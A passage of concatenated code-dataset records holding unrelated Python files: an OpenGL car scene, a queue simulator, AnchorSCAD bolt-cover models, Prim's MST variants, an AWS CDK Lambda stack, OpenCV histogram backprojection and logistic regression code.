createCar(252/255,246/255,246/255, 255/255, 153/255, 153/255, controller.lights)\n blueCarNode = createCar(252/255,246/255,246/255, 0, 76/255, 153/255, False)\n groundNode = createGround()\n ricardoNode = createRicardo_1(\"ricardo1.png\")\n blueCarNode.transform = np.matmul(tr2.rotationZ(-np.pi/4), tr2.translate(3.0,0,0.5))\n\n # Define radius of the circumference\n r = 2\n\n # lookAt of normal camera\n normal_view = tr2.lookAt(\n np.array([5, 5, 6]),\n np.array([0, 0, 0]),\n np.array([0, 0, 1])\n )\n\n\n while not glfw.window_should_close(window):\n\n # Telling OpenGL to use our shader program\n glUseProgram(mvcPipeline.shaderProgram)\n # Using the same view and projection matrices in the whole application\n projection = tr2.perspective(45, float(width) / float(height), 0.1, 100)\n glUniformMatrix4fv(glGetUniformLocation(mvcPipeline.shaderProgram, \"projection\"), 1, GL_TRUE, projection)\n\n # Calculate coordinates of the camera and redCar\n u_px = np.cos(glfw.get_time())\n u_py = np.sin(glfw.get_time())\n x = r * u_px\n y = r * u_py\n\n u_tx = -u_py\n u_ty = u_px\n\n if controller.follow_car:\n # moving camera\n 
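# The camera rides the car's circle at (x, y) and aims r units ahead along the\n            # unit tangent (u_tx, u_ty) = (-sin t, cos t), keeping the eye height fixed at 1.\n            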
normal_view = tr2.lookAt(\n np.array([x, y, 1]),\n np.array([x + r * u_tx, y + r * u_ty, 1]),\n np.array([0, 0, 1])\n )\n else:\n # static camera\n normal_view = tr2.lookAt(\n np.array([5, 5, 6]),\n np.array([0, 0, 0]),\n np.array([0, 0, 1])\n )\n\n glUniformMatrix4fv(glGetUniformLocation(mvcPipeline.shaderProgram, \"view\"), 1, GL_TRUE, normal_view)\n\n # Using GLFW to check for input events\n glfw.poll_events()\n\n # Clearing the screen in both, color and depth\n glClear(GL_COLOR_BUFFER_BIT | GL_DEPTH_BUFFER_BIT)\n\n # Filling or not the shapes depending on the controller state\n if (controller.fillPolygon):\n glPolygonMode(GL_FRONT_AND_BACK, GL_FILL)\n else:\n glPolygonMode(GL_FRONT_AND_BACK, GL_LINE)\n\n if controller.showAxis:\n glUniformMatrix4fv(glGetUniformLocation(mvcPipeline.shaderProgram, \"model\"), 1, GL_TRUE, tr2.identity())\n mvcPipeline.drawShape(gpuAxis, GL_LINES)\n\n # Moving the red car and rotating its wheels\n redCarNode.transform = np.matmul(tr2.translate(0, 0, 0.5), tr2.translate(x, y, 0))\n redCarNode.transform = np.matmul(redCarNode.transform, tr2.rotationZ(glfw.get_time() + np.pi / 2))\n redWheelRotationNode = sg.findNode(redCarNode, \"wheelRotation\")\n redWheelRotationNode.transform = tr2.rotationY(10 * glfw.get_time())\n\n # Uncomment to print the red car position on every iteration\n #print(sg.findPosition(redCarNode, \"car\"))\n\n # Drawing the Car\n sg.drawSceneGraphNode(blueCarNode, mvcPipeline)\n if not controller.lights:\n sg.drawSceneGraphNode(redCarNode, mvcPipeline)\n\n\n else:\n # Drawing redCar using light shader\n glUseProgram(phongPipeline.shaderProgram)\n\n # Setting all uniform shader variables\n glUniform3f(glGetUniformLocation(phongPipeline.shaderProgram, \"lightColor\"), 1.0, 1.0, 1.0)\n glUniform3f(glGetUniformLocation(phongPipeline.shaderProgram, \"lightPos\"), -5, -5, 5)\n glUniform3f(glGetUniformLocation(phongPipeline.shaderProgram, \"viewPos\"), 5, 5, 6)\n glUniform1ui(glGetUniformLocation(phongPipeline.shaderProgram, \"shininess\"), 100)\n glUniform1f(glGetUniformLocation(phongPipeline.shaderProgram, \"constantAttenuation\"), 0.001)\n glUniform1f(glGetUniformLocation(phongPipeline.shaderProgram, \"linearAttenuation\"), 0.1)\n glUniform1f(glGetUniformLocation(phongPipeline.shaderProgram, \"quadraticAttenuation\"), 0.01)\n\n glUniformMatrix4fv(glGetUniformLocation(phongPipeline.shaderProgram, \"projection\"), 1, GL_TRUE, projection)\n glUniformMatrix4fv(glGetUniformLocation(phongPipeline.shaderProgram, \"view\"), 1, GL_TRUE, normal_view)\n\n sg.drawSceneGraphNode(redCarNode, phongPipeline)\n\n\n # Drawing ground and ricardo using texture shader\n glUseProgram(textureShaderProgram.shaderProgram)\n glUniformMatrix4fv(glGetUniformLocation(textureShaderProgram.shaderProgram, \"projection\"), 1, GL_TRUE, projection)\n glUniformMatrix4fv(glGetUniformLocation(textureShaderProgram.shaderProgram, \"view\"), 1, GL_TRUE, normal_view)\n # Drawing ground\n sg.drawSceneGraphNode(groundNode, textureShaderProgram)\n sg.drawSceneGraphNode(ricardoNode, textureShaderProgram)\n\n\n # Once the render is done, buffers are swapped, showing only the complete scene.\n glfw.swap_buffers(window)\n\n glfw.terminate()","repo_name":"CC3501/CC3501-2019-1","sub_path":"aux5/aux_5.py","file_name":"aux_5.py","file_ext":"py","file_size_in_byte":12842,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"29"} +{"seq_id":"5686109278","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sat May 30 2020\n\nModule for M/M/c/K queue 
problem.\n\n@author: Almas Fauzia\n Gregorius Aria Neruda\n Rayhan Naufal Ramadhan\n\"\"\"\n\nimport random\nimport queue\nimport math\nimport csv\nimport sys\n\n\nclass Event:\n def __init__(self):\n self.eventType = None\n self.rate = CDF_inverse(random.random())\n self.server_label = None # denotes which server\n\n def arrival(self):\n self.eventType = 'arrival'\n\n def service(self, server_label):\n self.eventType = 'service'\n self.server_label = server_label\n # if eventType == arrival, rate is the time needed until the next customer arrives\n # if eventType == service, rate is the time needed for server to serve the customer that is in it\n\n\ndef decrease_rate(tempEvent, listOfEvents):\n for event in listOfEvents:\n if event.eventType == 'arrival' or (event.eventType == 'service' and not servers[event.server_label].empty()):\n event.rate -= tempEvent.rate\n # if event.eventType == 'arrival':\n # writer.writerow([f'[Time: {str(time)}] Remaining {event.eventType} time in Queue: {str(event.rate)}'])\n # else:\n # writer.writerow([f'[Time: {str(time)}] Remaining {event.eventType} time in Server {str(event.server_label)}: {str(event.rate)}'])\n return listOfEvents\n\n\n# function to calculate rate from exponential distribution\ndef CDF_inverse(CDF):\n return -1 * math.log(1-CDF) / exp_dist_lambda\n\n\ndef init_queue(q, server_label):\n global custArrive\n global custServiced\n global time\n global n\n global i\n global listOfEvents\n\n i += 1\n custArrive = i\n q.put_nowait(custArrive)\n n -= 1\n writer.writerow(\n [f'[Time: {str(time)}] Customer{str(custArrive)} is entering the queue.'])\n newEvent = Event()\n newEvent.arrival()\n listOfEvents.append(newEvent)\n # writer.writerow([f'[Time: {str(time)}] Next {newEvent.eventType} in {str(newEvent.rate)}'])\n\n custServiced = q.get_nowait()\n servers[server_label].put_nowait(custServiced)\n writer.writerow(\n [f'[Time: {str(time)}] Customer{str(custServiced)} is being served in Server {server_label}.'])\n for server in range(SERVERS):\n newEvent = Event()\n newEvent.service(server)\n listOfEvents.append(newEvent)\n # writer.writerow([f'[Time: {str(time)}] Next completed {newEvent.eventType} for Server {server_label} in {str(newEvent.rate)}'])\n\n\ndef start_queue(q, server_label, temp):\n global custArrive\n global custServiced\n global time\n global n\n global i\n global listOfEvents\n global haventArrived\n global dropped\n\n if temp.eventType == 'arrival':\n i += 1\n custArrive = i\n time += temp.rate\n listOfEvents.remove(temp)\n\n # if the arrival happens because of other than haventArrived situation\n if not haventArrived:\n listOfEvents = decrease_rate(temp, listOfEvents)\n newEvent = Event()\n newEvent.arrival()\n try:\n q.put_nowait(custArrive)\n writer.writerow(\n [f'[Time: {str(time)}] Customer{str(custArrive)} is entering the queue.'])\n\n # if there is no queue, find empty server\n for server_label in range(len(servers)):\n if q.qsize() == 1 and not servers[server_label].full():\n custServiced = q.get_nowait()\n servers[server_label].put_nowait(custServiced)\n writer.writerow(\n [f'[Time: {str(time)}] Customer{str(custServiced)} is being served in Server {server_label}.'])\n break\n except Exception:\n writer.writerow(\n [f'[Time: {str(time)}] Queue is full, Customer{str(custArrive)} is dropped from Queue.'])\n dropped.append(custArrive)\n else:\n time += temp.rate\n newEvent = Event()\n newEvent.service(server_label)\n listOfEvents.remove(temp)\n listOfEvents = decrease_rate(temp, listOfEvents)\n custServiced = 
servers[server_label].get_nowait()\n        writer.writerow(\n            [f'[Time: {str(time)}] Customer{str(custServiced)} is leaving Server {server_label}.'])\n\n        # if the next customer has arrived, the next customer enters the server\n        if not q.empty():\n            custServiced = q.get_nowait()\n            servers[server_label].put_nowait(custServiced)\n            writer.writerow(\n                [f'[Time: {str(time)}] Customer{str(custServiced)} is being served in Server {server_label}.'])\n\n    listOfEvents.append(newEvent)\n    # if (newEvent.eventType == 'arrival'):\n    #     writer.writerow([f'[Time: {str(time)}] Next {newEvent.eventType} in {str(newEvent.rate)}'])\n    # else:\n    #     writer.writerow([f'[Time: {str(time)}] Next completed {newEvent.eventType} for Server {server_label} in {str(newEvent.rate)}'])\n\n    n -= 1\n    haventArrived = False\n\n\ndef main():\n    q = queue.Queue(QUEUE_SIZE)\n    for server in range(SERVERS):\n        servers.append(queue.Queue(1))\n    init_queue(q, 0)\n\n    while n > 0:\n        # restore events\n        for event in eventsOnHold:\n            eventsOnHold.remove(event)\n            listOfEvents.append(event)\n\n        # take the first coming event from queue\n        temp = sorted(listOfEvents, key=lambda event: event.rate)[0]\n        # search for an arrival event if temp is a service event but the next customer has not arrived yet\n        while (temp.eventType == 'service'):\n            if (q.empty()) & (servers[temp.server_label].empty()):\n                # writer.writerow([f'[Time: {str(time)}] Next customer has not arrived yet in Queue.'])\n                haventArrived = True\n\n                eventsOnHold.append(temp)\n                listOfEvents.remove(temp)\n                temp = sorted(listOfEvents, key=lambda event: event.rate)[0]\n            else:\n                break\n\n        start_queue(q, temp.server_label, temp)\n\n\nif __name__ == '__main__':\n    try: # Global variables\n        # maximum number of customers inside queue (K-1), set to `0` if infinite\n        QUEUE_SIZE = int(sys.argv[2])\n\n        # number of servers (c)\n        SERVERS = int(sys.argv[1])\n\n        exp_dist_lambda = 0.5\n        custArrive = 0\n        custServiced = 0\n        n = 150 # number of events\n        i = 0 # customer id\n        time = 0\n\n        dropped = []\n        servers = []\n        listOfEvents = []\n        eventsOnHold = [] # list to store events on-hold\n        haventArrived = False\n\n        # build .csv file to save the log\n        file = open('logMMcK.csv', 'w', newline='')\n        writer = csv.writer(file)\n\n        main()\n    except IndexError:\n        print(\"One or more arguments is missing \\n\")\n        print(\"usage: python ./MMcK.py <c> <K> \\n\")\n        print(\"- c : number of servers\")\n        print(\"- K : maximum number of customers in queue (excluding customer being served) \\n\")\n        sys.exit(1)\n","repo_name":"almasfw/antrian","sub_path":"MMcK.py","file_name":"MMcK.py","file_ext":"py","file_size_in_byte":7008,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"29"} +{"seq_id":"36818934563","text":"\"\"\"\nUnit\n\"\"\"\n\nfrom ..base.attribute import UnitAttribute_t\nfrom ..base.damage import Damage_t, DamageStatus\n\n\nclass Unit:\n    \"\"\"Unit class\"\"\"\n\n    name: str\n    \"\"\"Name\"\"\"\n    HP: int\n    \"\"\"Current HP\"\"\"\n    unit_attribute: UnitAttribute_t\n    \"\"\"Unit attributes\"\"\"\n\n    def __init__(self, name: str, attribute: UnitAttribute_t) -> None:\n        self.name = name\n        self.unit_attribute = attribute\n\n    @property\n    def alive(self) -> bool:\n        \"\"\"Whether the unit is still alive\"\"\"\n        return self.HP > 0\n\n    def reset_HP(self) -> None:\n        \"\"\"Reset HP to its attribute value\"\"\"\n        self.HP = self.unit_attribute.HP\n\n    def get_hurt(self, damage: Damage_t) -> None:\n        \"\"\"Apply damage to the unit\"\"\"\n        if damage.status == DamageStatus.Missed:\n            return\n\n        if damage.value > self.HP:\n            self.HP = 0\n        else:\n            self.HP -= 
damage.value\n","repo_name":"JustUndertaker/combat_simulation","sub_path":"combat_simulation/uint/uint.py","file_name":"uint.py","file_ext":"py","file_size_in_byte":865,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"29"} +{"seq_id":"32402957773","text":"'''\nCreated on 29 May 2022\n\n@author: gianni\n'''\n\nimport anchorscad as ad\nfrom anchorscad.models.basic.regular_prism import RegularPrism\n\n\n@ad.shape\n@ad.datatree\nclass BoltHeadRecess(ad.CompositeShape):\n '''\n Creates a recess for an N sided bolt head.\n '''\n bolt_head_d: float=14.8\n bolt_sides: int=6\n bolt_h: float=8\n bolt_r: float=ad.dtfield(\n self_default=lambda s: s.bolt_head_d / 2, init=False) \n head_node: ad.Node=ad.dtfield(\n ad.ShapeNode(RegularPrism, \n {'nsides': 'bolt_sides', 'r': 'bolt_r', 'h': 'bolt_h'}))\n head_turns: int=3\n\n EXAMPLE_SHAPE_ARGS=ad.args()\n EXAMPLE_ANCHORS=()\n\n def build(self) -> ad.Maker:\n turn_angle = 360 / (self.bolt_sides * self.head_turns)\n bolt_head = self.head_node()\n maker = bolt_head.solid(('bolt_head', 0)).at('base')\n for i in range(1, self.head_turns):\n maker.add_at(\n bolt_head.solid(('bolt_head', i)).at('base', pre=ad.rotZ(i * turn_angle))\n )\n return maker\n\n@ad.shape\n@ad.datatree\nclass BoltCoverHat(ad.CompositeShape):\n '''\n A \"hat\" for the bolt cover with zip tie holes.\n '''\n r: float=20\n h: float=6\n head_node: ad.Node=ad.dtfield(\n ad.ShapeNode(ad.Cylinder))\n \n tie_r: float=3\n tie_h: float=20\n \n tie_node: ad.Node=ad.dtfield(\n ad.ShapeNode(ad.Cylinder, prefix='tie_'))\n \n tie_count: int=9\n tie_offs: float=ad.dtfield(\n self_default=lambda s: s.r - s.tie_r - 2)\n \n epsilon: float=0.001\n\n EXAMPLE_SHAPE_ARGS=ad.args()\n EXAMPLE_ANCHORS=()\n\n def build(self) -> ad.Maker:\n maker = self.head_node().solid('hat').at('base')\n \n tie = self.tie_node()\n for i in range(self.tie_count):\n maker.add_at(tie.hole(('tie', i)).at('base'),\n 'base', rh=1, \n pre=ad.rotZ(i * 360 / self.tie_count) * ad.tranX(self.tie_offs), \n post=ad.ROTX_180 * ad.tranZ(self.epsilon))\n \n return maker\n\n\n@ad.shape\n@ad.datatree\nclass BoltCover(ad.CompositeShape):\n '''\n Battery terminal cover where the terminal is a hex bolt. 
Has space for\n    cables terminating at the battery terminal.\n    '''\n    cover_r_top: float=14\n    cover_r_base: float=10\n    cover_h: float=10\n    \n    cover_node: ad.Node=ad.dtfield(\n        ad.ShapeNode(ad.Cone, prefix='cover_'), init=False)\n    \n    base_cover_hole_r: float=14.7/2\n    base_cover_hole_h: float=1.3\n    base_cover_hole_node: ad.Node=ad.dtfield(\n        ad.ShapeNode(ad.Cylinder, prefix='base_cover_hole_'), init=False)\n    \n    upper_bolt_head_d: float=14.8\n    upper_bolt_h: float=5.9\n    upper_recess_node: ad.Node=ad.dtfield(\n        ad.ShapeNode(BoltHeadRecess, prefix='upper_'), init=False)\n    \n    lower_bolt_head_d: float=14.6\n    lower_bolt_h: float=2.1\n    lower_recess_node: ad.Node=ad.dtfield(\n        ad.ShapeNode(BoltHeadRecess, prefix='lower_'), init=False)\n    \n    hat_node: ad.Node=ad.dtfield(ad.ShapeNode(BoltCoverHat), init=False)\n    \n    epsilon: float=0.01\n    \n    EXAMPLE_SHAPE_ARGS=ad.args(fn=64)\n\n    def build(self) -> ad.Maker:\n\n        shape = self.cover_node()\n        maker = shape.solid('cover').at('base', post=ad.ROTX_180)\n        \n        base_cover_hole = self.base_cover_hole_node()\n        \n        maker.add_at(base_cover_hole.hole('base_cover_hole').at('base'),\n                     'base', post=ad.tranZ(self.epsilon))\n        \n        lower_recess = self.lower_recess_node()\n        \n        maker.add_at(lower_recess\n                     .hole('lower_recess')\n                     .colour((0.0, 1.0, 0.35, 0.4))\n                     .at('base'),\n                     'base_cover_hole', 'base', rh=1, post=ad.tranZ(self.epsilon))\n        \n        upper_recess = self.upper_recess_node()\n        \n        maker.add_at(upper_recess.hole('upper_recess').at('base'),\n                     'lower_recess', 'base', rh=1, post=ad.tranZ(self.epsilon))\n        \n        hat = self.hat_node()\n        \n        maker.add_at(hat.composite('hat').at('base'),\n                     'base', rh=1)\n\n        return maker\n\n\n# Uncomment the line below to default to writing OpenSCAD files\n# when anchorscad_main is run with no --write or --no-write options.\nMAIN_DEFAULT=ad.ModuleDefault(True)\n\nif __name__ == \"__main__\":\n    ad.anchorscad_main()\n","repo_name":"owebeeone/anchorscad","sub_path":"src/anchorscad/models/covers/bolt_cover.py","file_name":"bolt_cover.py","file_ext":"py","file_size_in_byte":4395,"program_lang":"python","lang":"en","doc_type":"code","stars":18,"dataset":"github-code","pt":"29"} +{"seq_id":"25304806348","text":"from queue import PriorityQueue\nimport time\nfrom collections import deque\n\n# Using my approach\ndef findMST1(n,graph): # using prim's algorithm Time complexity => (N+E) + NLog(N)\n    key = [1e9]*n\n    parent = [-1]*n\n    key[0] = 0\n    mst = [False]*n\n    parent[0] = 0\n    for i in range(n):\n        mini = (1e9,1e9)\n        for neighbour, wt in graph[i]:\n            if wt < mini[1]:\n                mini = (neighbour, wt)\n        print(\"Mini --> \", mini)\n    print(parent)\n\n\n\n# Using brute force approach\n\ndef findMST2(n,graph): # using prim's algorithm Time complexity => (N+E) + N^2\n    key = [1e9]*n\n    mst = [False]*n\n    parent = [-1]*n\n    key[0] = 0\n    parent[0] = 0\n    for i in range(n-1):\n        mini = 1e9\n        u = None\n\n        for v in range(n):\n            if mst[v]==False and key[v]<=mini:\n                mini = key[v]\n                u = v\n        \n        mst[u] = True\n        for neighbour, wt in graph[u]:\n            if mst[neighbour]==False and key[neighbour]>wt:\n                parent[neighbour] = u\n                key[neighbour] = wt\n    \n    print(parent)\n\n\n# Using Min Heap to optimize the brute force approach\n\ndef findMST3(n,graph): # using prim's algorithm Time complexity => (N+E) + NLog(N)\n    key = [1e9]*n\n    mst = [False]*n\n    parent = [-1]*n\n    key[0] = 0\n    parent[0] = 0\n    pq = PriorityQueue()\n    pq.put((0, 0)) # (weight, node) so the queue orders by edge weight\n    while not pq.empty():\n        wt_u, u = pq.get()\n        if mst[u]:\n            continue # stale entry: u was already added via a cheaper edge\n        mst[u] = True\n        for neighbour, wt in graph[u]:\n            if mst[neighbour]==False and key[neighbour]>wt:\n                pq.put((wt, neighbour))\n                parent[neighbour] = u\n                key[neighbour] = wt\n    \n    
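# PriorityQueue pops the lexicographically smallest tuple, so pushing\n    # (weight, node) yields cheapest-edge-first order; entries that went\n    # stale are skipped by the mst[u] check above.\n    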
print(parent)\n\n\nn = 5\nm = 6\ngraph = {}\nprint(\"Enter Graph Values\")\nfor i in range(m):\n    a,b, wt = map(int,input().split())\n    if a not in graph:\n        graph[a] = []\n    if b not in graph:\n        graph[b] = []\n    graph[a].append((b,wt))\n    graph[b].append((a,wt))\n\n# print(graph)\nstart = time.time()\nfindMST1(n, graph)\nt1 = (time.time()-start)\nprint(\"First Time Period %.6f\"%(time.time()-start))\nstart = time.time()\nfindMST2(n, graph)\nt2 = (time.time()-start)\nprint(\"Second Time Period %.6f\"%(time.time()-start))\nstart = time.time()\nfindMST3(n, graph)\nt3 = (time.time()-start)\nprint(\"Third Time Period %.6f\"%(time.time()-start))\nprint(\"MST1 wins\" if t1 None:\n        super().__init__(scope, construct_id, **kwargs)\n\n        self.prediction_lambda = _lambda.DockerImageFunction(\n            scope=self,\n            id=\"ExampleDockerLambda\",\n            # Function name on AWS\n            function_name=\"ExampleDockerLambda\",\n            # Use aws_cdk.aws_lambda.DockerImageCode.from_image_asset to build\n            # a docker image on deployment\n            code=_lambda.DockerImageCode.from_image_asset(\n                # Directory relative to where you execute cdk deploy\n                # that contains a Dockerfile with build instructions\n                directory=\"cdk_docker_lambda/ExampleDockerLambda\"\n            ),\n        )\n\n        self.prediction_lambda.add_function_url(\n            auth_type=_lambda.FunctionUrlAuthType.NONE\n        )","repo_name":"youngsoul/cdk_docker_lambda_furl","sub_path":"cdk_docker_lambda/cdk_docker_lambda_stack.py","file_name":"cdk_docker_lambda_stack.py","file_ext":"py","file_size_in_byte":1015,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"} +{"seq_id":"41227072449","text":"import cv2\nimport numpy as np\nfrom matplotlib import pyplot as plt\n\n# np.set_printoptions(threshold=np.inf)\n\n'''\nHistogram backprojection: if a region of an image shows a structural texture or a distinct\nobject, the histogram of that region can be treated as a probability function giving the\nprobability that a pixel belongs to that texture or object. Backprojection means first\nbuilding the histogram model of a feature, then using that model to locate the feature in\na test image.\n'''\n\n'''Numpy implementation >>>>>>>>>>>>>>>>>'''\n# 1. First compute the color histogram M of the target object and the histogram I of the whole image\nroi = cv2.imread('../../images/flower-part.png')\nhsv = cv2.cvtColor(roi, cv2.COLOR_BGR2HSV)\n\ntarget = cv2.imread('../../images/flower-full.jpg')\nhsvt = cv2.cvtColor(target, cv2.COLOR_BGR2HSV)\nM = cv2.calcHist([hsv], [0, 1], None, [180, 256], [0, 180, 0, 256])\nI = cv2.calcHist([hsvt], [0, 1], None, [180, 256], [0, 180, 0, 256])\n\n# 2. Compute the ratio R = M/I and backproject R: treating R as a palette, build an image whose pixel values are the probability of belonging to the target\n# B(x,y) = R[h(x,y),s(x,y)], h=hue,s=saturation\nR = M / (I + 1)\nh, s, v = cv2.split(hsvt)\nB = R[h.ravel(), s.ravel()]\nB = np.minimum(B, 1)\nB = B.reshape(hsvt.shape[:2])\n\n# 3. Create and apply a convolution kernel\ndisc = cv2.getStructuringElement(cv2.MORPH_ELLIPSE, (5, 5)) # 5x5 elliptical kernel\ncv2.filter2D(B, -1, disc, B)\nB = np.uint8(B)\ncv2.normalize(B, B, 0, 255, cv2.NORM_MINMAX)\n\n
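# A common variant (sketch, reusing M and hsvt from above): OpenCV's built-in\n# cv2.calcBackProject backprojects the normalized ROI histogram directly,\n# rather than the ratio R:\n#   cv2.normalize(M, M, 0, 255, cv2.NORM_MINMAX)\n#   B = cv2.calcBackProject([hsvt], [0, 1], M, [0, 180, 0, 256], 1)\n# The filter2D / threshold post-processing below stays the same.\n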
# 4. The position of maximum intensity gives the location of the object\nret, thresh = cv2.threshold(B, 50, 255, 0)\ncv2.imshow('res', thresh)\ncv2.waitKey(0)\n'''<<<<<<<<<<<<<<<<<<<<<<<< 0.50, 1, 0)\n    \n        return y_pred\n    \n    # Function to print Evaluation Metrics:\n    def printMetrics(self, y, y_pred, name_to_print, method, set_):\n        \"\"\"\n\n        Parameters\n        ----------\n        y : array of uint8\n            actual y values (y train or y test).\n        y_pred : array of uint8\n            predicted y values.\n        name_to_print : string\n            name of the model (Logistic Regression or Naive Bayes).\n        method : string\n            type of method (scratch or sklearn).\n        set_ : string\n            type of set (train or test).\n\n        Returns\n        -------\n        None.\n\n        \"\"\"\n        print(\"\\nPrinting Metrics for {} from {} on the {} set.\".format(name_to_print.capitalize(), method.capitalize(), set_.capitalize()))\n        cfm = confusion_matrix(y, y_pred)\n        print(\"\\nConfusion Matrix: \")\n        print(\"\\n\", cfm)\n        print(\"\\n\\nClassification Report:\" )\n        print(classification_report(y, y_pred))\n        acc = accuracy_score(y, y_pred)\n        print(\"\\nAccuracy of the Model: \", round(acc, 3))\n        print(\"Classification Error of the Model: \", round(1-acc, 3))\n        \n        return\n    \n    # Function to run Logistic Regression using Gradient Descent:\n    def logisticRegression(self, X, y):\n        \"\"\"\n        \n\n        Parameters\n        ----------\n        X : array of float64\n            train or test set.\n        y : array of uint8\n            actual y values (y train or y test).\n\n        Returns\n        -------\n        w : array of size x-features\n            optimal weights for logistic regression.\n        b : float\n            bias.\n\n        \"\"\"\n        # Sigmoid Function:\n        sigmoid = lambda w, b, X : 1/(1 + np.exp(-(np.dot(X, w) + b)))\n        x_rows, x_cols = X.shape[0], X.shape[1]\n        self.w = np.zeros(x_cols) # [w0, w1]\n        self.b = 0 # bias\n        \n        for it in range(self.max_it):\n            h_x = sigmoid(self.w, self.b, X)\n            temp_w = (1.0/x_rows)*(np.dot(X.T, (y.T - h_x).reshape(x_rows)))\n            temp_b = (1.0/x_rows)*(np.sum((y.T - h_x).reshape(x_rows)))\n            \n            self.w = self.w + self.l_rate*temp_w\n            self.b = self.b + self.l_rate*temp_b\n            \n            # stop once the parameter updates become smaller than eps\n            if np.all(np.abs(self.l_rate*temp_w) <= self.eps) and abs(self.l_rate*temp_b) <= self.eps:\n                break\n        \n        return self.w, self.b\n\n#%%\n\n# LOGISTIC REGRESSION AND NAIVE BAYES USING SKLEARN:\n#==============================================================================\n\ndef runMLModels(modelLabel, X, y):\n    \"\"\"\n    \n\n    Parameters\n    ----------\n    modelLabel : string\n        kind of model (logistic or NB).\n    X : array of float64\n        train or test set.\n    y : array of uint8\n        actual y values (y train or y test).\n\n    Returns\n    -------\n    classifier : model\n        class of the model.\n\n    \"\"\"\n    if modelLabel == \"logistic\":\n        classifier = LogisticRegression(random_state = 0)\n    elif modelLabel == \"NB\":\n        classifier = GaussianNB()\n    else:\n        print(\"Invalid Parameters\")\n    classifier.fit(X, y)\n    \n    return classifier\n\n#%%\n\n# Predicting using Scikit - Learn\ndef sklearnPredict(X, classifier):\n    \"\"\"\n    \n\n    Parameters\n    ----------\n    X : array of float64\n        train or test set.\n    classifier : model\n        class of the model.\n\n    Returns\n    -------\n    y_pred : array of uint8\n        predicted y values.\n\n    \"\"\"\n    y_pred = classifier.predict(X)\n    return y_pred\n    \n    \n#%%\n\n# Function to print Evaluation Metrics:\ndef printMetrics(y, y_pred, name_to_print, method, set_):\n    \"\"\"\n\n\n    Parameters\n    ----------\n    y : array of uint8\n        actual y values (y train or y test).\n    y_pred : array of uint8\n        predicted y values.\n    name_to_print : string\n        name of the model (Logistic Regression or Naive Bayes).\n    method : string\n        type of method (scratch or sklearn).\n    set_ : string\n        type of 
set (train or test).\n\n    Returns\n    -------\n    None.\n\n\n    \"\"\"\n    \n    print(\"\\nPrinting Metrics for {} from {} on the {} set.\".format(\n        name_to_print.capitalize(), method.capitalize(), set_.capitalize()))\n    cfm = confusion_matrix(y, y_pred)\n    print(\"\\nConfusion Matrix: \")\n    print(\"\\n\", cfm)\n    print(\"\\n\\nClassification Report:\" )\n    print(classification_report(y, y_pred))\n    acc = accuracy_score(y, y_pred)\n    print(\"\\nAccuracy of the Model: \", round(acc, 3))\n    print(\"Classification Error of the Model: \", round(1-acc, 3))\n    \n    return\n\n#%%\n\n\ndef plotDecisionBoundary(X, y, clf, legend, name_to_print, method, set_):\n    \"\"\"\n    \n\n    Parameters\n    ----------\n    X : array of float64\n        train or test set.\n    y : array of uint8\n        actual y values (y train or y test).\n    clf : model\n        class of the model.\n    legend : int\n        no of labels.\n    name_to_print : string\n        name of the model (Logistic Regression or Naive Bayes).\n    method : string\n        type of method (scratch or sklearn).\n    set_ : string\n        type of set (train or test).\n\n    Returns\n    -------\n    None.\n\n    \"\"\"\n    plot_decision_regions(X = X, y = y, clf = clf, legend = legend, \n                          colors = \"#b82121,#0915ed\")\n    plt.xlabel(\"X1\")\n    plt.ylabel(\"X2\")\n    plt.title(\"Decision Boundary for {} from {} on the {} set.\".format(\n        name_to_print.capitalize(), method.capitalize(), set_.capitalize()))\n    plt.show()\n    \n    return\n\n#%%\n\ndef main(X_train, X_test, y_train, y_test, modelLabel, method, l_rate, max_it,\n         name_to_print, set_):\n    \"\"\"\n    \n\n    Parameters\n    ----------\n    X_train : array of float64\n        x train set.\n    X_test : array of float64\n        x test set.\n    y_train : array of uint8\n        y train set.\n    y_test : array of uint8\n        y test set.\n    modelLabel : string\n        kind of model (logistic or NB).\n    method : string\n        type of method (scratch or sklearn).\n    l_rate : float\n        learning rate.\n    max_it : int\n        maximum iterations.\n    name_to_print : string\n        name of the model (Logistic Regression or Naive Bayes).\n    set_ : string\n        type of set (train or test).\n\n    Returns\n    -------\n    None.\n    \n\n    \"\"\"\n    if method == \"sklearn\":\n        classifier = runMLModels(modelLabel, X_train, y_train)\n        if set_ == \"train\":\n            y_pred = sklearnPredict(X_train, classifier)\n            printMetrics(y_train, y_pred, name_to_print, method, set_)\n            plotDecisionBoundary(X_train, y_train, classifier, 2, \n                                 name_to_print, method, set_)\n        elif set_ == \"test\":\n            y_pred = sklearnPredict(X_test, classifier)\n            printMetrics(y_test, y_pred, name_to_print, method, set_)\n            plotDecisionBoundary(X_test, y_test, classifier, 2, \n                                 name_to_print, method, set_)\n        else:\n            print(\"Invalid set_ parameter\")\n    elif method == \"scratch\":\n        classifier = myLogisticRegression(l_rate, max_it, \n                                          name_to_print, method, set_)\n        w, b = classifier.logisticRegression(X_train, y_train)\n        if set_ == \"train\":\n            y_pred = classifier.predict(X_train)\n            classifier.printMetrics(y_train, y_pred,\n                                    name_to_print, method, set_)\n            plotDecisionBoundary(X_train, y_train, classifier, 2, \n                                 name_to_print, method, set_)\n        elif set_ == \"test\":\n            y_pred = classifier.predict(X_test)\n            classifier.printMetrics(y_test, y_pred,name_to_print, method, set_)\n            plotDecisionBoundary(X_test, y_test, classifier, 2,\n                                 name_to_print, method, set_)\n        else:\n            print(\"Invalid set_ parameter\")\n    else:\n        print(\"Invalid method parameter\")\n    \n    return\n    \n#%%\n\n# Driver Code:\nif __name__ == \"__main__\":\n    dataPath = \"datsets/lg_dataset.mat\"\n    X_train, X_test, y_train, y_test = loadData(dataPath)\n    \n    modelLabel = \"logistic\" # or \"NB\" for Naive Bayes\n    
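# NOTE: the from-scratch path implements logistic regression only; for \"NB\"\n    # use method = \"sklearn\" below.\n    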
